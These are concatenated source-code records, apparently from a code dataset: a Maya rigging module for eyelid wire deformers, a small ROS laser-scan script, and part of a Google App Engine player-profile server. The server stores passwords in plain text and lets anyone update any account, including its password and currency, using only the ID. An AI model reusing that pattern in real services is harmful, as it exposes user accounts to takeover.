ctrl_size=scale * 0.05,\n ctrl_color=ctrl_color, lock_channels=['v', 's'], side=side,\n suffix=suffix_controller\n )\n # controller lft 01\n controller_bind01 = 
rlu_controller.Control(match_obj_first_position=self.jnt01,\n prefix=self.prefix_name_crv + 'Drv01',\n shape=shape, groups_ctrl=['Zro', 'Offset', 'All'],\n ctrl_size=scale * 0.035,\n ctrl_color=ctrl_color, lock_channels=['v', 's'], side=side,\n suffix=suffix_controller\n )\n # controller lft 02\n controller_bind02 = rlu_controller.Control(match_obj_first_position=self.jnt02,\n prefix=self.prefix_name_crv + 'Drv02',\n shape=shape, groups_ctrl=['Zro', 'Offset'], ctrl_size=scale * 0.05,\n ctrl_color=ctrl_color, lock_channels=['v', 's'], side=side,\n suffix=suffix_controller\n )\n\n # create grp controller and parent into it\n drive_ctrl_grp = cmds.createNode('transform', n=self.prefix_name_crv + 'Ctrl' + side + '_grp')\n cmds.parent(controller_bind03.parent_control[0], controller_bind05.parent_control[0],\n controller_bind04.parent_control[0],\n controller_bind01.parent_control[0], controller_bind02.parent_control[0], drive_ctrl_grp)\n\n # connect group parent bind joint 01 and 02 to the controller grp parent 01 and 02\n rt_utils.connect_attr_translate_rotate(self.joint_bind04_grp, controller_bind04.parent_control[0])\n rt_utils.connect_attr_translate_rotate(self.joint_bind02_grp, controller_bind02.parent_control[0])\n\n # connect bind parent zro to ctrl zro parent\n if not connect_with_corner_ctrl:\n rt_utils.connect_attr_translate(self.joint_bind05_grp, controller_bind05.parent_control[0])\n rt_utils.connect_attr_translate(self.joint_bind01_grp, controller_bind01.parent_control[0])\n\n # flipping controller\n if controller_wire_low:\n if self.position_jnt_direction >= 0:\n # LOW LID LFT\n cmds.setAttr(controller_bind01.parent_control[1] + '.scaleX', -1)\n cmds.setAttr(controller_bind02.parent_control[1] + '.scaleX', -1)\n cmds.setAttr(controller_bind04.parent_control[1] + '.scaleX', 1)\n cmds.setAttr(controller_bind05.parent_control[1] + '.scaleX', 1)\n\n # connect translate controller to joint\n # right side 01 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind01.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt01, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind01.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt01, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # right side 02 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind02.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt02, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind02.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt02, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # left side 04 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind04.control,\n input_2X=1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt04, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind04.control,\n input_2X=-1, input_2Y=1, input_2Z=-1,\n joint_bind_target=self.jnt04, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # left side 05 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind05.control,\n input_2X=1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt05, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind05.control,\n input_2X=-1, input_2Y=1, 
input_2Z=-1,\n joint_bind_target=self.jnt05, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n else:\n # LOW LID RGT\n cmds.setAttr(controller_bind01.parent_control[1] + '.scaleX', 1)\n cmds.setAttr(controller_bind02.parent_control[1] + '.scaleX', 1)\n cmds.setAttr(controller_bind04.parent_control[1] + '.scaleX', -1)\n cmds.setAttr(controller_bind05.parent_control[1] + '.scaleX', -1)\n # connect translate controller to joint\n # right side 01 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind01.control,\n input_2X=1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt01, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind01.control,\n input_2X=-1, input_2Y=1, input_2Z=-1,\n joint_bind_target=self.jnt01, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # right side 02 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind02.control,\n input_2X=1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt02, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind02.control,\n input_2X=-1, input_2Y=1, input_2Z=-1,\n joint_bind_target=self.jnt02, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # left side 04 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind04.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt04, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind04.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt04, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # left side 05 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind05.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt05, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind05.control,\n input_2X=-1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt05, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n cmds.setAttr(controller_bind01.parent_control[1] + '.scaleY', -1)\n cmds.setAttr(controller_bind02.parent_control[1] + '.scaleY', -1)\n cmds.setAttr(controller_bind03.parent_control[1] + '.scaleY', -1)\n cmds.setAttr(controller_bind05.parent_control[1] + '.scaleY', -1)\n cmds.setAttr(controller_bind04.parent_control[1] + '.scaleY', -1)\n\n # mid translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind03.control,\n input_2X=1, input_2Y=-1, input_2Z=1,\n joint_bind_target=self.jnt03, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind03.control,\n input_2X=-1, input_2Y=1, input_2Z=-1,\n joint_bind_target=self.jnt03, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n else:\n # left side 03 translate and rotate\n rt_utils.connect_attr_translate_rotate(controller_bind03.control, self.jnt03)\n\n # UPLID LFT\n if self.position_jnt_direction >= 0:\n cmds.setAttr(controller_bind01.parent_control[1] + '.scaleX', -1)\n cmds.setAttr(controller_bind02.parent_control[1] + '.scaleX', -1)\n cmds.setAttr(controller_bind04.parent_control[1] + '.scaleX', 1)\n cmds.setAttr(controller_bind05.parent_control[1] + '.scaleX', 1)\n\n # right side 01 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind01.control,\n input_2X=-1, input_2Y=1, input_2Z=1,\n 
joint_bind_target=self.jnt01, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind01.control,\n input_2X=1, input_2Y=-1, input_2Z=-1,\n joint_bind_target=self.jnt01, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # right side 02 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind02.control,\n input_2X=-1, input_2Y=1, input_2Z=1,\n joint_bind_target=self.jnt02, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind02.control,\n input_2X=1, input_2Y=-1, input_2Z=-1,\n joint_bind_target=self.jnt02, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # left side 04 translate and rotate\n rt_utils.connect_attr_translate_rotate(controller_bind04.control, self.jnt04)\n\n # left side 05 translate and rotate\n rt_utils.connect_attr_translate_rotate(controller_bind05.control, self.jnt05)\n\n else:\n # UPLID RGT\n cmds.setAttr(controller_bind01.parent_control[1] + '.scaleX', 1)\n cmds.setAttr(controller_bind02.parent_control[1] + '.scaleX', 1)\n cmds.setAttr(controller_bind04.parent_control[1] + '.scaleX', -1)\n cmds.setAttr(controller_bind05.parent_control[1] + '.scaleX', -1)\n\n # right side 01 translate and rotate\n rt_utils.connect_attr_translate_rotate(controller_bind01.control, self.jnt01)\n\n # right side 02 translate and rotate\n rt_utils.connect_attr_translate_rotate(controller_bind02.control, self.jnt02)\n\n # left side 04 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind04.control,\n input_2X=-1, input_2Y=1, input_2Z=1,\n joint_bind_target=self.jnt04, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind04.control,\n input_2X=1, input_2Y=-1, input_2Z=-1,\n joint_bind_target=self.jnt04, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n # left side 05 translate and rotate\n rlu_transform.bind_translate_reverse(control=controller_bind05.control,\n input_2X=-1, input_2Y=1, input_2Z=1,\n joint_bind_target=self.jnt05, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n rlu_transform.bind_rotate_reverse(control=controller_bind05.control,\n input_2X=1, input_2Y=-1, input_2Z=-1,\n joint_bind_target=self.jnt05, side_RGT=side_RGT, side_LFT=side_LFT,\n side=side)\n\n self.drive_ctrl_grp = drive_ctrl_grp\n self.controller_bind01 = controller_bind01.control\n self.controller_bind01_grp = controller_bind01.parent_control[0]\n\n self.controller_bind05 = controller_bind05.control\n self.controller_bind05_grp = controller_bind05.parent_control[0]\n\n self.controller_bind03 = controller_bind03.control\n self.controller_bind03_grp = controller_bind03.parent_control[0]\n\n # CONNECT OFFSET BIND TO CTRL BIND\n rt_utils.connect_attr_translate(self.joint_bind01_grp_offset, controller_bind01.parent_control[1])\n rt_utils.connect_attr_translate(self.joint_bind02_grp_offset, controller_bind02.parent_control[1])\n rt_utils.connect_attr_translate(self.joint_bind03_grp_offset, controller_bind03.parent_control[1])\n rt_utils.connect_attr_translate(self.joint_bind04_grp_offset, controller_bind04.parent_control[1])\n rt_utils.connect_attr_translate(self.joint_bind05_grp_offset, controller_bind05.parent_control[1])\n\n def wire_bind_curve(self, curve, offset_jnt02_bind_position, offset_jnt04_bind_position, ctrl01_direction,\n ctrl02_direction,\n ctrl03_direction, ctrl04_direction, ctrl05_direction, scale, side=''):\n length_joint_position = len(self.all_joint)\n\n # query 
position of bind joint\n joint01 = self.all_joint[(length_joint_position * 0)]\n\n joint02 = self.all_joint[int((length_joint_position / 4) + offset_jnt02_bind_position)]\n\n if not len(self.all_joint) % 2 == 0:\n joint03 = self.all_joint[int(length_joint_position / 2)]\n self.xform_jnt03 = cmds.xform(joint03, ws=1, q=1, t=1)\n\n else:\n temp_jnt03 = self.all_joint[int(length_joint_position / 2)]\n temps_joint03 = self.all_joint[int(length_joint_position / 2) - 1]\n transform = cmds.createNode('transform', n='guide')\n joint03 = cmds.delete(cmds.parentConstraint(temp_jnt03, temps_joint03, transform))\n self.xform_jnt03 = cmds.xform(joint03, ws=1, q=1, t=1)\n cmds.delete(transform)\n\n joint04 = self.all_joint[\n int((((length_joint_position / 2) + (length_joint_position / 4)) - offset_jnt04_bind_position) + 1)]\n joint05 = self.all_joint[-1]\n\n # query the position right side\n self.xform_jnt01 = cmds.xform(joint01, ws=1, q=1, t=1)\n self.xform_jnt02 = cmds.xform(joint02, ws=1, q=1, t=1)\n self.xform_jnt04 = cmds.xform(joint04, ws=1, q=1, t=1)\n self.xform_jnt05 = cmds.xform(joint05, ws=1, q=1, t=1)\n # mc.delete(transform)\n\n cmds.select(cl=1)\n self.jnt01 = cmds.joint(n=rt_utils.prefix_name(self.prefix_name_crv) + '01' + side + '_driver',\n p=self.xform_jnt01, rad=0.5 * scale)\n self.jnt02 = cmds.duplicate(self.jnt01, n=rt_utils.prefix_name(self.prefix_name_crv) + '02' + side + '_driver')[\n 0]\n self.jnt03 = cmds.duplicate(self.jnt01, n=rt_utils.prefix_name(self.prefix_name_crv) + '03' + side + '_driver')[\n 0]\n self.jnt04 = cmds.duplicate(self.jnt01, n=rt_utils.prefix_name(self.prefix_name_crv) + '04' + side + '_driver')[\n 0]\n self.jnt05 = cmds.duplicate(self.jnt01, n=rt_utils.prefix_name(self.prefix_name_crv) + '05' + side + '_driver')[\n 0]\n\n # set the position RGT joint\n cmds.xform(self.jnt02, ws=1, t=self.xform_jnt02)\n cmds.xform(self.jnt03, ws=1, t=self.xform_jnt03)\n cmds.xform(self.jnt04, ws=1, t=self.xform_jnt04)\n cmds.xform(self.jnt05, ws=1, t=self.xform_jnt05)\n\n # create bind curve\n deform_curve = cmds.duplicate(curve)[0]\n\n deform_curve = cmds.rename(deform_curve,\n (rt_utils.prefix_name(self.prefix_name_crv) + 'Driver' + side + '_crv'))\n\n # parent the bind joint\n joint_bind03_grp = rlu_transform.create_parent_transform(parent_list=['Zro', 'Offset'], object=self.jnt03,\n match_position=self.jnt03,\n prefix=self.prefix_name_crv + 'Drv03',\n suffix='_driver', side=side)\n\n joint_bind05_grp = rlu_transform.create_parent_transform(parent_list=['Zro', 'Offset', 'All', 'Corner'],\n object=self.jnt05,\n match_position=self.jnt05,\n prefix=self.prefix_name_crv + 'Drv05',\n suffix='_driver', side=side)\n\n joint_bind04_grp = rlu_transform.create_parent_transform(parent_list=['Zro', 'Offset'], object=self.jnt04,\n match_position=self.jnt04,\n prefix=self.prefix_name_crv + 'Drv04',\n suffix='_driver', side=side)\n\n joint_bind01_grp = rlu_transform.create_parent_transform(parent_list=['Zro', 'Offset', 'All', 'Corner'],\n object=self.jnt01,\n match_position=self.jnt01,\n prefix=self.prefix_name_crv + 'Drv01',\n suffix='_driver', side=side)\n\n joint_bind02_grp = rlu_transform.create_parent_transform(parent_list=['Zro', 'Offset'], object=self.jnt02,\n match_position=self.jnt02,\n prefix=self.prefix_name_crv + 'Drv02',\n suffix='_driver', side=side)\n\n if self.position_jnt_direction > 0:\n cmds.setAttr(joint_bind01_grp[0] + '.rotateY', ctrl01_direction * -1)\n cmds.setAttr(joint_bind02_grp[0] + '.rotateY', ctrl02_direction * -1)\n cmds.setAttr(joint_bind03_grp[0] + 
'.rotateY', ctrl03_direction)\n cmds.setAttr(joint_bind05_grp[0] + '.rotateY', ctrl05_direction)\n cmds.setAttr(joint_bind04_grp[0] + '.rotateY', ctrl04_direction)\n\n else:\n cmds.setAttr(joint_bind01_grp[0] + '.rotateY', ctrl01_direction)\n cmds.setAttr(joint_bind02_grp[0] + '.rotateY', ctrl02_direction)\n cmds.setAttr(joint_bind03_grp[0] + '.rotateY', ctrl03_direction * -1)\n cmds.setAttr(joint_bind05_grp[0] + '.rotateY', ctrl05_direction * -1)\n cmds.setAttr(joint_bind04_grp[0] + '.rotateY', ctrl04_direction * -1)\n\n # rebuild the curve\n cmds.rebuildCurve(deform_curve, rpo=1, rt=0, end=1, kr=0, kcp=0,\n kep=1, kt=0, s=8, d=3, tol=0.01)\n\n # skinning the joint to the bind curve\n skin_cluster = cmds.skinCluster([self.jnt05, self.jnt04, self.jnt01, self.jnt02, self.jnt03], deform_curve,\n n='%s%s%s%s' % (\n rt_utils.prefix_name(self.prefix_name_crv), 'Wire', side, 'SkinCluster'),\n tsb=True,\n bm=0, sm=0, nw=1, mi=3)\n\n # Distribute the skin\n skin_percent_index0 = '%s.cv[0]' % deform_curve\n skin_percent_index1 = '%s.cv[1]' % deform_curve\n skin_percent_index2 = '%s.cv[2]' % deform_curve\n skin_percent_index3 = '%s.cv[3]' % deform_curve\n skin_percent_index4 = '%s.cv[4]' % deform_curve\n skin_percent_index5 = '%s.cv[5]' % deform_curve\n skin_percent_index6 = '%s.cv[6]' % deform_curve\n skin_percent_index7 = '%s.cv[7]' % deform_curve\n skin_percent_index8 = '%s.cv[8]' % deform_curve\n skin_percent_index9 = '%s.cv[9]' % deform_curve\n skin_percent_index10 = '%s.cv[10]' % deform_curve\n\n cmds.skinPercent(skin_cluster[0], skin_percent_index0, tv=[(self.jnt01, 1.0)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index1, tv=[(self.jnt01, 0.9), (self.jnt02, 0.1)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index2, tv=[(self.jnt01, 0.7), (self.jnt02, 0.3)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index3,\n tv=[(self.jnt02, 0.5), (self.jnt01, 0.25), (self.jnt03, 0.25)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index4, tv=[(self.jnt02, 0.3), (self.jnt03, 0.7)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index5, tv=[(self.jnt03, 1.0)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index6, tv=[(self.jnt04, 0.3), (self.jnt03, 0.7)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index7,\n tv=[(self.jnt04, 0.5), (self.jnt05, 0.25), (self.jnt03, 0.25)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index8, tv=[(self.jnt05, 0.7), (self.jnt04, 0.3)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index9, tv=[(self.jnt05, 0.9), (self.jnt04, 0.1)])\n cmds.skinPercent(skin_cluster[0], skin_percent_index10, tv=[(self.jnt05, 1.0)])\n\n # wire the curve\n wire_deformer = cmds.wire(curve, dds=(0, 100 * scale), wire=deform_curve)\n wire_deformer[0] = cmds.rename(wire_deformer[0],\n (rt_utils.prefix_name(self.prefix_name_crv) + side + '_wireNode'))\n cmds.setAttr(wire_deformer[0] + '.scale[0]', 0)\n\n # constraint mid to 02 left and right\n jnt02_bind_constraint_grp = cmds.parentConstraint(self.jnt03, self.jnt01, joint_bind02_grp[0], mo=1)\n jnt04_bind_constraint_grp = cmds.parentConstraint(self.jnt03, self.jnt05, joint_bind04_grp[0], mo=1)\n\n # rename constraint\n rt_utils.constraint_rename([jnt02_bind_constraint_grp[0], jnt04_bind_constraint_grp[0]])\n\n # create grp curves\n curves_grp = cmds.createNode('transform', n=self.prefix_name_crv + 'Crv' + side + '_grp')\n cmds.setAttr(curves_grp + '.it', 0, l=1)\n cmds.parent(deform_curve, cmds.listConnections(wire_deformer[0] + '.baseWire[0]')[0], curves_grp)\n cmds.hide(curves_grp)\n\n # create grp bind\n 
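# all five driver-joint hierarchies end up under a single hidden transform\n        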
bind_jnt_grp = cmds.createNode('transform', n=self.prefix_name_crv + 'JntDriver' + side + '_grp')\n cmds.parent(joint_bind03_grp[0], joint_bind05_grp[0], joint_bind04_grp[0],\n joint_bind01_grp[0], joint_bind02_grp[0], bind_jnt_grp)\n cmds.hide(bind_jnt_grp)\n\n self.joint_bind04_grp = joint_bind04_grp[0]\n self.joint_bind02_grp = joint_bind02_grp[0]\n self.joint_bind05_grp_all = joint_bind05_grp[2]\n self.joint_bind01_grp_all = joint_bind01_grp[2]\n self.joint_bind05_grp = joint_bind05_grp[0]\n self.joint_bind01_grp = joint_bind01_grp[0]\n self.joint_bind03_grp = joint_bind03_grp[0]\n\n self.joint_bind04_grp_offset = joint_bind04_grp[1]\n self.joint_bind02_grp_offset = joint_bind02_grp[1]\n self.joint_bind05_grp_offset = joint_bind05_grp[1]\n self.joint_bind01_grp_offset = joint_bind01_grp[1]\n self.joint_bind03_grp_offset = joint_bind03_grp[1]\n\n self.joint_bind01_grp_corner = joint_bind01_grp[3]\n self.joint_bind05_grp_corner = joint_bind05_grp[3]\n\n self.curves_grp = curves_grp\n self.bind_jnt_grp = bind_jnt_grp\n\n def create_joint_wire(self, curve, side, scale, game_bind_joint, parent_sgame_joint):\n\n curve_vetex = cmds.ls('%s.cv[0:*]' % curve, fl=True)\n\n self.all_joint = []\n self.locator_grp_offset = []\n self.locator_grp_zro = []\n self.all_skin = []\n self.joint_grp_zro = []\n\n for index, object in enumerate(curve_vetex):\n # create joint\n cmds.select(cl=1)\n joint = cmds.joint(n='%s%02d%s%s' % (self.prefix_name_crv, (index + 1), side, '_skn'), rad=0.1 * scale)\n if game_bind_joint:\n joint_bind = cmds.joint(n='%s%02d%s%s' % (self.prefix_name_crv, (index + 1), side, '_bind'),\n rad=0.1 * scale)\n constraining = rt_utils.parent_scale_constraint(joint, joint_bind)\n cmds.parent(joint_bind, parent_sgame_joint)\n cmds.parent(constraining[0], constraining[1], 'additional_grp')\n cmds.setAttr(joint_bind + '.segmentScaleCompensate', 0)\n\n postion_object = cmds.xform(object, q=1, ws=1, t=1)\n cmds.xform(joint, ws=1, t=postion_object)\n self.all_joint.append(joint)\n\n joint_grp = rlu_transform.create_parent_transform(parent_list=[''], object=joint,\n match_position=joint,\n prefix=self.prefix_name_crv + str(index + 1).zfill(2),\n suffix='_jnt', side=side)\n\n self.joint_grp_zro.append(joint_grp[0])\n # create locator\n # locator = mc.spaceLocator(n='%s%02d%s%s' % (self.prefixNameCrv, (i + 1), side, '_loc'))[0]\n group_offset = \\\n cmds.spaceLocator(n='%s%s%02d%s%s' % (self.prefix_name_crv, 'Offset', (index + 1), side, '_loc'))[0]\n cmds.hide(group_offset)\n\n cmds.xform(group_offset, ws=1, t=postion_object)\n locator_grp = rlu_transform.create_parent_transform(parent_list=[''], object=group_offset,\n match_position=group_offset,\n prefix=self.prefix_name_crv + str(index + 1).zfill(2),\n suffix='_zro', side=side)\n self.locator_grp_offset.append(group_offset)\n self.locator_grp_zro.append(locator_grp[0])\n # self.allLocator.append(groupOffset)\n\n # connect curve to locator grp\n curve_list_relatives = cmds.listRelatives(curve, s=True)[0]\n uParam = rlu_core.get_uParam(postion_object, curve_list_relatives)\n pci_node = cmds.createNode(\"pointOnCurveInfo\",\n n='%s%02d%s%s' % (self.prefix_name_crv, (index + 1), side, '_pci'))\n cmds.connectAttr(curve_list_relatives + '.worldSpace', pci_node + '.inputCurve')\n cmds.setAttr(pci_node + '.parameter', uParam)\n cmds.connectAttr(pci_node + '.position', locator_grp[0] + '.t')\n\n decompose_node = cmds.createNode('decomposeMatrix',\n n='%s%02d%s%s' % (self.prefix_name_crv, (index + 1), side, '_dmtx'))\n cmds.connectAttr(group_offset + 
'.worldMatrix[0]', decompose_node + '.inputMatrix')\n\n            cmds.connectAttr(decompose_node + '.outputTranslate', joint_grp[0] + '.translate')\n            cmds.connectAttr(decompose_node + '.outputRotate', joint_grp[0] + '.rotate')\n\n        # grouping joint\n        self.joint_grp = cmds.group(em=1, n=self.prefix_name_crv + 'Jnt' + side + '_grp')\n        cmds.parent(self.joint_grp_zro, self.joint_grp)\n\n        # grouping locator\n        self.locator_grp = cmds.group(em=1, n=self.prefix_name_crv + 'Loc' + side + '_grp')\n        cmds.setAttr(self.locator_grp + '.it', 0, l=1)\n        cmds.parent(self.locator_grp_zro, self.locator_grp)\n","sub_path":"rigging/library/base/face/wire.py","file_name":"wire.py","file_ext":"py","file_size_in_byte":36962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"106530438","text":"#!/usr/bin/env python\nimport rospy\nfrom sensor_msgs.msg import LaserScan\nimport numpy as np\n\nglobal MIN_SCAN_ANGLE_RAD\nglobal MAX_SCAN_ANGLE_RAD\nglobal TURN_SPEED_MPS\nMIN_SCAN_ANGLE_RAD = (-90.0) / 180.0 * np.pi\nMAX_SCAN_ANGLE_RAD = (+90.0) / 180.0 * np.pi\nTURN_SPEED_MPS = 1.57\n\ndef callback(scan_msg):\n    minIndex = np.ceil((MIN_SCAN_ANGLE_RAD - scan_msg.angle_min) / scan_msg.angle_increment)\n    maxIndex = np.floor((MAX_SCAN_ANGLE_RAD - scan_msg.angle_min)/ scan_msg.angle_increment)\n    midIndex = (minIndex+maxIndex)/2\n    #print(maxIndex)\n    closestRange_left = scan_msg.ranges[int(minIndex)]\n    print(closestRange_left)\n\nif __name__ == '__main__':\n    rospy.init_node('scan_values')\n    sub = rospy.Subscriber('scan', LaserScan, callback)\n    rospy.spin()\n","sub_path":"lds_test/lds_test01.py","file_name":"lds_test01.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"132883865","text":"from google.appengine.ext import ndb\n\nimport webapp2\n\nclass PlayerDB(ndb.Model):\n    id = ndb.StringProperty()\n    password = ndb.StringProperty()\n    score = ndb.IntegerProperty()\n    soft_cash = ndb.IntegerProperty()\n    hard_cash = ndb.IntegerProperty()\n    equipment = ndb.IntegerProperty()\n    item = ndb.IntegerProperty()\n    buying_equipment_eye = ndb.IntegerProperty()\n    buying_equipment_body = ndb.IntegerProperty()\n    buying_equipment_mouth = ndb.IntegerProperty()\n    buying_equipment_fin = ndb.IntegerProperty()\n    hp_lv = ndb.IntegerProperty()\n    #scale_lv = ndb.IntegerProperty()\n    speed_lv = ndb.IntegerProperty()\n    fever_lv = ndb.IntegerProperty()\n    nick_name = ndb.StringProperty()\n    exp_lv = ndb.IntegerProperty()\n    exp_sub = ndb.IntegerProperty()\n    \nclass MainPage(webapp2.RequestHandler):\n    def login(self):\n        id = self.request.get('id')    \n        password = self.request.get('password')\n        qry = PlayerDB.query(ancestor=ndb.Key('Group', 'Profile'))\n        qry = qry.filter(PlayerDB.id == id)\n        #qry = qry.filter(PlayerDB.password == password)\n        playerDBList = qry.fetch(1)\n        isExistID = False\n        isEqualPS = False\n        for playerDBele in playerDBList:\n            if(playerDBele.id == id):\n                isExistID = True\n            if(playerDBele.password == password):\n                isEqualPS = True\n            break\n        if(isExistID and isEqualPS):\n            self.response.write('ok')\n        else:\n            if(isExistID == False):\n                self.response.write('fail : ID not Existed')    \n            elif(isEqualPS == False):\n                self.response.write('fail : PS is wrong')    \n        \n    def isExistedID(self):\n        id = self.request.get('id')    \n        qry = PlayerDB.query(ancestor=ndb.Key('Group', 'Profile'))\n        qry = qry.filter(PlayerDB.id == id)\n        playerDBs = qry.fetch(1)\n        isExistID = False\n        for playerDBchd in playerDBs:\n            if(playerDBchd.id 
== id):\n isExistID = True\n break\n return isExistID\n \n def create(self):\n isExistID = self.isExistedID()\n \n if(isExistID == False):\n playerDB = PlayerDB(parent = ndb.Key('Group', 'Profile'))\n playerDB.id = self.request.get('id')\n playerDB.password = self.request.get('password')\n \n score = self.request.get('score')\n playerDB.score = int(score)\n \n soft_cash = self.request.get('soft_cash')\n playerDB.soft_cash = int(soft_cash)\n \n hard_cash = self.request.get('hard_cash')\n playerDB.hard_cash = int(hard_cash)\n \n equipment = self.request.get('equipment')\n playerDB.equipment = int(equipment)\n \n item = self.request.get('item')\n playerDB.item = int(item)\n \n buying_equipment_eye = self.request.get('buying_equipment_eye')\n playerDB.buying_equipment_eye = int(buying_equipment_eye)\n \n buying_equipment_body = self.request.get('buying_equipment_body')\n playerDB.buying_equipment_body = int(buying_equipment_body)\n \n buying_equipment_mouth = self.request.get('buying_equipment_mouth')\n playerDB.buying_equipment_mouth = int(buying_equipment_mouth)\n \n buying_equipment_fin = self.request.get('buying_equipment_fin')\n playerDB.buying_equipment_fin = int(buying_equipment_fin)\n \n hp_lv = self.request.get('hp_lv')\n playerDB.hp_lv = int(hp_lv)\n \n #scale_lv = self.request.get('scale_lv')\n #playerDB.scale_lv = int(scale_lv)\n \n speed_lv = self.request.get('speed_lv')\n playerDB.speed_lv = int(speed_lv)\n \n fever_lv = self.request.get('fever_lv')\n playerDB.fever_lv = int(fever_lv)\n \n nick_name = self.request.get('nick_name')\n playerDB.nick_name = nick_name\n \n exp_lv = self.request.get('exp_lv')\n playerDB.exp_lv = int(exp_lv)\n \n exp_sub = self.request.get('exp_sub')\n playerDB.exp_sub = int(exp_sub)\n \n playerDB.put()\n \n self.response.write('ok')\n else:\n self.response.write('fail : ID Duplicated')\n \n \n def update(self):\n isExistID = self.isExistedID()\n if(isExistID == True):\n id = self.request.get('id') \n qry = PlayerDB.query(ancestor=ndb.Key('Group', 'Profile'))\n qry = qry.filter(PlayerDB.id == id)\n playerDBs = qry.fetch(1)\n for playerDBchd in playerDBs:\n score = self.request.get('score')\n int_score = int(score)\n if(int_score != -1):\n playerDBchd.score = int_score\n \n soft_cash = self.request.get('soft_cash')\n int_soft_cach = int(soft_cash)\n if(int_soft_cach != -1):\n playerDBchd.soft_cash = int_soft_cach\n \n hard_cash = self.request.get('hard_cash')\n int_hard_cash = int(hard_cash)\n if(int_hard_cash != -1):\n playerDBchd.hard_cash = int_hard_cash\n \n equipment = self.request.get('equipment')\n int_equipment = int(equipment)\n if(int_equipment != -1):\n playerDBchd.equipment = int_equipment\n \n item = self.request.get('item')\n int_item = int(item)\n if(int_item != -1):\n playerDBchd.item = int_item\n \n password = self.request.get('password')\n if(password != 'null'):\n playerDBchd.password = password\n \n buying_equipment_eye = self.request.get('buying_equipment_eye')\n int_buying_equipment_eye = int(buying_equipment_eye)\n if(int_buying_equipment_eye != -1):\n playerDBchd.buying_equipment_eye = int_buying_equipment_eye\n \n buying_equipment_body = self.request.get('buying_equipment_body')\n int_buying_equipment_body = int(buying_equipment_body)\n if(int_buying_equipment_body != -1):\n playerDBchd.buying_equipment_body = int_buying_equipment_body\n \n buying_equipment_mouth = self.request.get('buying_equipment_mouth')\n int_buying_equipment_mouth = int(buying_equipment_mouth)\n if(int_buying_equipment_mouth != -1):\n 
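# a real value arrived for this field (the -1 sentinel means it was left unchanged)\n                    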
